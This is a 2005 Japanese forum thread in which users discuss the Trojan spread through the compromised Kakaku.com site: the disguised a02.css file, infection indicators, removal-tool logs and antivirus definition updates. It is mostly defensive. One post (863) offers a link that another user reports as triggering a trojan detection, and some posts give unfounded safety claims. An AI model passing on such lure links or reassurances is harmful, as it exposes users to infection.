747 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:51:13
結局、opera使ってる俺は勝ち組?

748 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:51:33
>>111のa02.cssっていうのはヘルプファイルなどで使われる拡張子.chmの偽装。
このCHMファイルをエンコードすると中に#.exeという実行ファイルが
埋め込まれているのがわかる。これがウィルスの本体。

Trojan-PSW.Win32.Delf.fz(Kaspersky)

749 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:52:12
>>658
>>663
XP sp2 パッチ最新
ブラウザはIEで設定デフォルト
ウイルス対策ソフトなしで運用してて

さっき専用駆除ツールやったけど感染してなかったよ
何が感染の条件なんだ?


750 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:54:36
>>749
他のウィルスに感染してる悪寒

751 :217:2005/05/16(月) 17:57:08
>>731

12日の時点で、Symantecに感染ファイルを送り、ベータ版の定義ファイルをもらってから
駆除は終了してるよ。

ベータ版の定義ファイルはIntelligent Updaterよりも新しい物で、企業としてサポート契約してるからもらえた。


752 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:58:24
>>749
BitDefenderを一回掛けて、IEのキャッシュに有ることのみ確認できた(つか、実験でj4sb踏ん
でおいた)が、その状態でレジストリ見たら弄られていなかった。
キャッシュに有るだけで感染した!って騒いでてのもかなり居そうだから、基本的にはパッチ
が当たってれば「発症」はしないんじゃないかねぇ…
ただSP1の間は、うpだて掛けても途中からずーっとちゃんと当たってないという事例も結構
有ったからなぁ。SP2以降で当て損ねが出ているとどうなんだろうね。


753 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:13:38
手元の環境で感染させて、トレンドマイクロの駆除ツール試してみました。

== 1回目実行ログ
Start time : 月 5 16 2005 18:03:07
Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Administrator\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]
TROJ_DELF.RM[virus clean failed]
-->delete process("C:\WINNT\system32\Explorer.exe","","") success
-->delete file("C:\WINNT\system32\Explorer.exe","","") success
-->modify registry data("n/a","Software\Microsoft\Windows NT\CurrentVersion\Windows\","load") success
-->delete process("Explorer.exe","","") success
-->delete file("C:\WINNT\System32\htdll.dll","","") fail
-->create process("Explorer.exe","","") success
Complete time : 月 5 16 2005 18:03:07
Execute pattern count(1), Virus found count(1), Virus clean count(0), Clean failed count(1)

== 2回目実行ログ
Start time : 月 5 16 2005 18:03:18
Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Administrator\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]
TROJ_DELF.RM[virus found]
-->delete process("Explorer.exe","","") success
-->delete file("C:\WINNT\System32\htdll.dll","","") success
-->create process("Explorer.exe","","") success
Complete time : 月 5 16 2005 18:03:19
Execute pattern count(1), Virus found count(1), Virus clean count(1), Clean failed count(0)

754 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:15:31
== 3回目実行ログ
Start time : 月 5 16 2005 18:03:31
Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Administrator\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]
Complete time : 月 5 16 2005 18:03:31
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

2回実行しないとダメなのかな?
とりあえず駆除はしてくれる模様です。

755 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:15:42
>>753
乙っす。
ちゃんと働いてくれるんだねー。。。
たぶん、、、

756 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:16:13
今価格踏んだら感染しないの

757 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:16:22
俺もバーチャルPCで試してみよかな

758 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:16:22
>>753
一回目は発見したけど失敗して、
2回目で発見して駆除できたってこと?

759 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:17:16
Execute pattern count(1)ってのはなんじゃ?

760 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:17:33
htdll.dllを握ってて消せないのかね。まあfailしてるからわかるだろうけど

761 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:17:51
ちがう場所にEXPLORER.EXEってのがあったけどPFファイルだから無問題?

762 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:18:33
>>748
悪質なスパイウェアがよく使う手だな。
初心者以外で引っ掛かるようことはないだろう。

763 :753:2005/05/16(月) 18:19:30
>>758
感染させて再起動したらデスクトップの背景しか表示されなかったので、
タスクマネージャからEXPLORER.EXEを実行させたんです。
なもんでEXPLORER.EXEが2つ起動(?)されて、1回じゃ駆除されなかったのかも。


764 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:20:09
>>761
pfはプログラム起動高速化のための物だから無問題

765 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:21:13
>>759
恐らくスキャンする部分が固定されてて、そこがあったよってことかと。
誰でもExecute pattern count(1)なんだと思う

766 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:21:20
とりあえず踏んでない漏れは無関係ですね





767 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:21:58
>764
ありがとん

768 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:22:44
価格コムの今踏んだら警告文出るだけ?


769 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:23:14
>>768
踏め

770 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:23:22
>>765
なるほろ
気にしなくていいのか

771 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:23:32 ?
謝罪!賠償!

772 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:25:10
>>768
謝ってるのと駆除用のアプリの一ヶ月利用キーとかが書いてある

773 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:25:18
>>763
初期に感染の疑いがある奴の報告だと
デスクトップに何も表示されなくなるって言っているから
それが目に見える症状なんだろうね。


774 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:26:23
ノートンも来たらしいね。よくわらんけど。

http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.jasbom.html

775 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:27:28
>>774
発表だけで対策がまだなんだけどね orz

776 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:28:11
IFrameでプログラムを実行されることなんて信頼サイトに登録していない限りないから大丈夫

777 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:28:29
>>774
># 対応日(Intelligent Updater) * 2005年05月16日 (米国時間)
と書いてあって、まだ5/15のやつしか落とせないね。
日本時間で言うと明日リリースかな・・・?

778 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:28:46
>>769踏んだよ
謝罪文がかいてあったね


779 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:28:53
>>773
>>217のことだな

780 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:29:03
日付見てると分かるが、正式にリリースした定義ファイルだと
まだ対応してないぞ、例のβ使うしか。

781 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:29:25
中華のスパーハカーは愉快だなぁ

782 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:30:03
シマンテックの例のベータはたしか15日のリビジョン35だったかと。
それでも一応効果はあるのかも。

783 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:30:16
>>774
このトロイ、ZAの動作も停止させるか。

784 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:30:33
>>439
だれか日経とカカクコムに217の存在を教えてやれ

785 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:30:46
>>777
Intelligent Updaterは対応してるんだと思う。確かめてないけど。。。
少なくとも>>41時点よりウイルス対応済み数が2つ増えてる。

786 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:33:33
>>784
被害ゼロってのはウソですぜ!ってな。

787 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:33:46
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。




788 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:34:41
ノートン先生の緊急授業
ftp://ftp.symantec.com/AVDEFS/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

789 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:35:45
>>786
株価対策口からでまかせというのは理解してると思われ

790 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:36:06
で、結局、価格コム上で何をやった人が感染したの?

掲示板に投稿した人とか限定してくれると、助かるのだが。

791 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:36:19
ノートン先生は今必死になって駆除ツール作ってるのかなぁ
がんばれよー

792 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:36:54
>>788
そいつが例のβとかいう奴かね?

793 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:37:36
緊急リリース=ベータだよ

794 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:38:41
>>792
そこまで緊急じゃなくてもIntelligent Updaterで対応してるかも、、、
かも・・・・・・。

795 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:39:15
これは株価操作のためにウィルス仕込んだ経済犯罪とも言えるのか?
事前にこの情報を知ってればぼろ儲けだろ。

796 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:39:19
日付ではっきり否定してますが

797 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:39:34
>>793
有難う今回の件良くわかってなくて
今からスキャンしてくるよ

798 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:39:45
>>790
http://clubpc.vis.ne.jp/ie/i6.html
こういう馬鹿は間違いなく感染w

799 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:39:47
ネクタイを締めず寝グセもなおさずに講義を始めるノートン先生を想像

800 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:41:17
McAfee導入したばかりの俺は・・・・                                              悲しい。

801 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:42:38
>>790
バッファオーバーフローでのインストールだから、
セキュリティパッチ未適用とセキュリティソフトがDownloadJectのコードに対応していない人が
サイト閲覧だけでトロイを無条件にインストールされた

802 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:43:37
>>794
Intelligent Updaterでは16日(米国時間)に対応のもよう。
多分もうすぐ来るよ。

803 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:43:54
>>788
いきなりexeファイルへ飛ばすな!
俺はアホですと1万回叫んで歩け!

804 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:45:32
>>803


805 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:45:36
>>803
シマンテックからのメールでもEXEに直りんだったゾ(;´Д`)

806 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:45:45
>>798
JavaScriptとVBScriptとJava appletの実行を無効にしておけばほとんどは安全だよ

807 :748:2005/05/16(月) 18:47:36
ttp://www.viruslist.com/en/viruses/encyclopedia?chapter=152540521#psw

PSW Trojansとは(適当要約)
あらゆる種類のパスワードを盗む。
実行プログラム内のコード化されたメールアドレスへこの情報を送りつける。


808 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:48:20
>>803 が「最初の f を削れよ!」とか言い出すと予想

809 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:49:44
>>788
これは、やったほうがいいのかな?


810 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:51:51
>>805
シマンテックからのメールと落書きを同列に扱えとでも言うのか?

811 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:52:33
トレンドマイクロのオンラインスキャン掛けてるんだけど、どの位で終わるんだ
あと何分とか、残りファイル数とか、経過時間くらい出してもらいたい

812 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:53:18
>>810
メールでOKなら落書きでもOKだなぁ。
てか、ftpだししょうがねえだろ。

813 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:53:22
htdll.dllある 感染してる
htdll.dllない 感染してない

ってことじゃだめなの?

814 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:53:32
>>798
そこ見ると
I設定でIFRAME無効にしたのに表示されるのはどうして?
同じサイトでのIFRAMEだから?

815 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:54:09
>>809
urlにrapidreleaseと書いてあるから信じてあてちゃったよ
んでスキャンしてる

816 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:58:26
>>815
あんたみたいな警戒心のない人が危ない

817 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:59:22
>>815
マジ?
ネタだろ

818 :名無しさん@お腹いっぱい。:2005/05/16(月) 18:59:56
無問題

819 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:01:58
>>815
すげーーネタじゃないなら、おまいすごすぎw


820 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:02:32
>>815 当てると15日の非公開リビジョンの35になる
正常動作するし

821 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:03:48
35じゃねえ36になってる

822 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:04:11
おまえらexe恐怖症か

823 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:04:38
rapidrelease→Intelligent Updaterの順番かなぁ?
Intelligent Updater当ててればOK?

824 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:04:41
>>814
そう。デフォルト中ではプロンプト。ここのサイトは有害だな。低にしろと言っている。

825 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:06:16
おいオマイラ、NODインストールしたら、IEから板の書き込みも
YAHOOメールの返信も

Bad Request
Your browser sent a request that this server could not understand.
Invalid Content-Length

ってのが出て何も出来なくなったが、
ブラウザの設定変えられたのか?
それとも...何事だ?
今、Mozillaから書いてる漏れだった。

おかしくねぇ〜か??

826 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:07:34
>>825
そんなのおかしいですよ、カテジナさん

827 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:08:54
>>824
全部IFRAME表示できない様にすると
フレーム使ってるサイトは表示できないから?

828 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:13:05
安全なファイル00209                                    .exe

829 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:13:53
>826 何か設定変えればいいのか?
cookieがどーだの、あまり詳しくないが
ブラウザrebootしても駄目だボ

上のエラーは、どう言う症状だ?
そのまま訳すと、
悪い要望

オマイのブラウザは,オマイの言っている事を理解できない
何とか...か?

830 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:14:16
まだー?

831 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:14:41
>>822
exeファイルを平気で踏む奴を別名アホと言います。

832 :Trojan.Jasbom:2005/05/16(月) 19:16:00
このメッセージは Symantec Security Response Automationによって自動的に
作成されたメッセージです。このシステムは Symantec Security Response
へ送付されたファイルを分析し処理するために設計されました。
ファイルに関する情報や現在の状態をお知らせします。


ファイルを分析しました。送られたそれぞれのファイルについて
わかったことを以下に報告します。
ファイル名: a02.css
結果: このファイルは次のウィルスに感染しています:
Trojan.Jasbom

デベロッパーノート
a02.css is non-repairable threat. NAV with the latest rapidrelease
definition detects this. Please delete this file and replace it if
neccessary. Please follow the instruction at the end of this email
message to install the latest rapidrelease definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

----------------------------------------------------------------------
このメッセージはシマンテック・セキュリティ・レスポンスによって自動的に
生成されました。

(C)2005 シマンテック・セキュリティ・レスポンス
(P)2005 シマンテック・セキュリティ・レスポンス

833 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:16:11
価格ドットコムって馬鹿だな

834 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:17:22
>827 もしかするとi-frameが表示できなくなったって事は
NODが勝手に、カカクに仕込まれたI-Frame上のウィルスにアクセスしないように
設定して下さったので、他のサービスも全部使用できなくなったって事ですか?
カカク何とかしろ!
何でこんな苦労せなならんのじゃ〜〜〜....ハァハァ

835 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:21:00
N速+はわかりやすいバカが必死

836 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:22:25
7時のNHKニュースでも来たね。さらりと。

>>835
まあ、あっちはああいう方向で行ってくれればいいかと、、、

837 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:22:39
>>825はマルチのクソバカ

838 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:23:05
結局トロイくらってどうやって個人情報抜かれるの?
メールからって書いてたとこもあったけども
俺、アカウント一時的に削除した
誰かが張ってくれた.cssのファイルをインテリうpデートしたノートンは何も検出してくれん
アカウント停止しても無駄?


839 :感染キテタ━━━━━━(゚∀゚)━━━━━━ !!:2005/05/16(月) 19:23:27

  ァ  ∧_∧ ァ,、
 ,、'` ( ´∀`) ,、'`
  '`  ( ⊃ ⊂)  '`
ttp://www.uploda.org/file/uporg100290.jpg

840 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:24:07
>>838
本当に感染してるのかどうか、まず確認しろ。

841 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:24:55
てか価格コムのトップページ見ても、何やったら感染して、
感染したらどうなるのか、具体的な事がさっぱりわからん。
もうちょっとまともな情報がほしいな。

842 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:25:07
Norton先生でスキャン中だけど、見つかるかなぁ((((;゚Д゚))))ガクガクブルブル

誰か教えて

843 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:25:50
>>842
(゚∀゚)

844 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:27:39
こっちにも馬鹿が流れてきたか

845 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:28:36
>>841
それを書くと恥になるし、警視庁のハイテク対策センターだって
レベルが低いからバッファオーバーフローでのインストールなんて
どうやるのかも理解出来んだろう?

846 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:28:42
>>842
うちと同じで多分、反応なし違うかな?
.css
絡みではまず何もノートンは当てにならん
msconfig内にも何も不審なものはうちには無い
レジストリのrun内見たし
とにかく、感染したPCから個人情報の抜かれ方がわからん
OEは使わないようにブロックしてたほうがいい気がする

847 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:29:09
>>841
まともな運営してなかったから、まともな情報出せないのでしょう?

848 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:32:22
>841
はげしく気になる。
俺5/11〜13あたりに確実に価格に行って書き込みまでしてるんだよな。
でも確認したけど感染は免れてるっぽい。


849 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:33:05
事件の概要はこう。
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7599.html

対策はこう
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.jasbom.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

850 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:33:51
感染経路は
http://vegalv50.nyx.bne.jp/misc/security/?id=case-site#jrmt
の2番目の方

感染した奴はその穴塞がずに突っ込んで逝った人

851 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:34:47
>>846
http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
Process Explorer使えよ
トロイはプロセス監視しないと見つけられない
何もRunに仕掛けられているとは限らないぞ

852 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:36:32
Win2kだけどJavaScript等全部オンのIEだけど感染してないな
kerioがブロックしたのか

853 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:39:05
>>851
d
それこれから試す

OS標準のタスクマネージャーではだめなん?

・Windows NT/2000/XP: トロイの木馬のプロセス(Setup.exe, Winupdate.exe, Winver.exeまたはInternets.exe)を停止。

どれも動いてなかった


854 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:39:44
株価あんまり下げなかったね。

855 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:45:46
とりあえずIISのへぼさを再認識したぞ。

856 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:48:00
なんか・・・某所(謎、あまりにも馬鹿ばっかで・・・初めはわろたが、      悲しくなってきた・・・・。 あんなもんなの?平均的なユーザーって?

857 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:50:06
>837 マルチなバカだけど、なんか文句あるか?
ホントにNOD入れたら書込みも、Yahooメールの返信もエラーで
出来なくなったんだよ。
IEのブラウザ設定なんざ、何年も触ってねぇからオボテないし。
漏れはCookieがおかしくなったんじゃねぇ〜かと言ってんだよ
>827ウルトラバカ

858 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:50:22
Windows update は一切なし
ウイルスバスターなんかは買っていません
その状態で価格.COM行ったけど
ウイルス感染なしです
どうも100%感染するものではないようですね

859 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:51:37
>>858 他に感染してる可能性のが高い

860 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:52:21
いやぁ、今日も平和だなー。

861 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:53:47
WinXP sp1
NIS+NAV

BitDefenderで確認したものの、感染ファイル無し。
IEで閲覧したことは確かだが、感染はしていないようだな。

862 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:53:55
>>858頭が感染してますよ?

863 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:56:12
>>858
http://imgbbs1.artemisweb.jp/robekaru/
ほれ!

864 :名無しさん@お腹いっぱい。:2005/05/16(月) 19:58:35
>>849 の対処方法で感染してると仮定してレジストリみてみたら値は書き換えられて無かった助かったのか?


865 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:01:36
俺も書き換えられてなかったよ
セーーフ

866 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:02:34
キンタマといいgooglkeといい、
いつも心配で集まってくるのは無頓着なハゲばかり

867 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:06:15
うn

868 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:10:20
トロイの木馬スレで発見した記事なんだけど
こういう騒ぎって2年前にもあったんだね・・・

感染した人の駆除対策の
参考になるかどうか分からないけど
一応貼っておきますね

http://www.itmedia.co.jp/enterprise/articles/0406/25/news076.html

869 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:10:31
>>864
シマンテックサイト テクニカルノートの1,4,5は念のため全部チェック。
それがめんどいなら、TMの一発駆除ツールを使ってもよし。

870 :701:2005/05/16(月) 20:11:54
>>740
激しく遅レススマソ。うpだてできないからジョナサン行って飯食ってました。

ユーザー名もパスワードも入れたし。間違ってないか確認もしました。
で、今やってもやっぱりサーバ接続に失敗。なんででしょ?

871 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:13:12
a02[1].cssってのがキャッシュにあった。
バスターはスルー。NOD32で検知した。バスターは発症前は検知できないの?

872 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:14:29
IE5.5かつActiveX&JAVA完全切り&スクリプト手動選択でネットしている俺は勝ち組

873 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:17:29
>>856
ここだって悲惨な状態じゃん。

874 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:20:26
>>863
トロイを検知

875 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:21:43
>>868
それをノートンはマイクロソフトが完全対応パッチをリリースする直前まで認めなかった
一部のDownload Jectの脆弱性には対応はしていたのだが、
亜種を含めての完全対応に積極的じゃなかったために、
にちゃんでも犠牲者が続出した
未だにノートンでは完全対応できていないために、
Windows Updateパッチ未対応だといつかはどこかのサイトでインストールされる

876 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:23:20
むこうはすでにPart5までいってるな。過疎板だから悲惨さが増幅しないんだろう。

877 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:24:15
>>869
TMの一発駆除してきたが引っかかって無かったよ
液晶何買うか見てたはずなんだけどなぁ?

878 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:26:07
>>877
閲覧したからといって、必ず感染するとは限らない。>>850のレスを参照。

879 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:28:18
a2ってソフトで対応できますか?

880 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:29:53
>>879
a02

881 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:30:46
MP3プレーヤーが欲しくなったから
値段を見にきたら、これかよ
タイミングわるいな・・・orz

882 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:31:03
Symantecのコーポレートバージョンで何台か管理。

いろいろやってみたけど、
・トレンドのツールは、IEの一時ファイルディレクトリに有るa*.cssとレジストリと
 WINDIRに作られるファイルだけ見てるみたい
・SymantecのRAPID(05/15 rev35〜)を掛けてみると、今まで引っ掛けなかった
 他のtempディレクトリに有った*.cssも検出(発症してなかった模様)
・Symantecは*.cssを検出出来てなかったが、EXPLORER.EXEとHTDLL.DLLが
 作られようとすると、別亜種として検出していた?

ってとこか。


883 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:40:54
価格.comみたいな比較サイトでお奨めある?

884 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:43:07
ヒント:板違い

885 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:53:55
ええい、ノートン先生はまだか

886 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:57:29
ノートンもマカもだめなのか?
トレンドだけ?


887 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:58:48
http://www.coneco.net/

888 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:59:16
>>876
むこうってどこ?

889 :名無しさん@お腹いっぱい。:2005/05/16(月) 20:59:24
>>886
>>695

890 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:01:43
>>888
ニュー速+

891 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:01:55
>>888
多分ここ↓
http://news19.2ch.net/test/read.cgi/newsplus/1116232495/

892 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:02:13
脳豚捨ててくるぽ
   /ハ
  ヘ⌒ヽフ
  (  ・ω・)
 {  U Ul
  ヾ.,____,ノ


893 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:06:45
>>892
イ`。
ftpサイトのrapidreleaseだと対応してるらしいぞ。

894 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:08:21
>>893
他社工作員に何を言っても・・・

895 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:08:38
Vectorがこの件に便乗してる件について。

896 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:09:10
なんでヒューリスティックで対応できないんだよ。

897 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:11:19
被害の影響把握に2週間 カカクコム社長が会見
インターネット関連のカカクコムが運営する価格比較サイトが不正アクセスを受けた問題で、
同社の穐田誉輝社長は16日夕、都内で記者会見し、被害の影響などの把握には2週間
程度かかるとの見通しを示した。
 穐田社長は会見で「利用者にご迷惑をお掛けし大変申し訳ない」と陳謝。個人の利用者
からは「ブラウザーが起動しない」との通報や、ウイルス駆除の方法などについての問い合わせ
が約300件あったという。
 ただ、サイトにアクセスした利用者がウイルスを取り込んだり、サイトに登録してあるメールアド
レスが流出した可能性があり、「件数などは調査中」(穐田社長)と語った。

穐田社長
http://ca.c.yimg.jp/news/1116241978/img.news.yahoo.co.jp/images/20050516/rbb/20050516-00000027-rbb-sci-view-000.jpg

898 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:11:50
バスターは2.631.00で検索して出てこなかったらOK?

899 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:12:40
>>896
ヒューリスティックで対応できるから、*cssのパターンマッチ手を抜いてた(?)と思われ。
まとめページにも出てると思うが、実行されてHTDLL.DLLとか書き込もうとすると適当な
亜種名で引っ掛けていた例あり。
それをすり抜けて発症していた例も有るのかな?


900 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:13:28
>>898
トレンドは駆除ツールは出したがパターンファイルでは未対応
正体つかみ損ねてるのか?

901 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:13:51
>490
ビルダーにa01.css〜a10.cssがあるんだな。
b01.css〜とかc01.css〜とかも

902 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:15:35
TROJ_DELF.RM
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

903 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:16:02
不正アクセスの被害に遭った価格.comのサーバーは自社で運営していたもので、
「インターネット関連企業として“最高のセキュリティ対策”を施していた」。カカクコムでは
以前から外部の攻撃を受けた経験があったが実被害を被ったことはなかった。それが、
今回の不正アクセスで「破られてはならないセキュリティ対策が破られてしまった」とショック
を隠せない様子。
なお、カカクコムでは自社のセキュリティ対策にはトレンドマイクロの製品を導入していたという。
               
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7610.html

そりゃトレンドマイクロの中の人も必死に対策する罠w
















904 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:16:20
一応トレンドの自動削除ツールを使ってみたが、
検出されなかった。安心ということでいいんですかね・・・。
不安になる。

905 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:16:34
BitとNODで検索しても出てこなかったよ
久しぶりにIEでセキュリティ中のままアクセスしたはずなんだが・・・

906 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:18:11
価格.comで何したら感染すんだろうね。
まだ明らかになってない?よね?

907 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:18:53
>>900
駆除ツールで発見されなかったが、a02.cssがキャッシュに残っててNOD32で駆除したんだが。
どういうこと?

908 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:18:56
そうでもないよ。

909 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:19:56
>>903
これは大きな失態ですな。トレンドマイクロ。


910 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:20:17
今朝ヤフーから価格.com飛んだんだけど、大丈夫ですよね?

911 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:20:26
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7613.html

912 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:21:12
微妙な(でもないが)失態が続くなぁ>トレンドマイクロ

913 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:21:56
トレンドには災難としか言いようが無い。
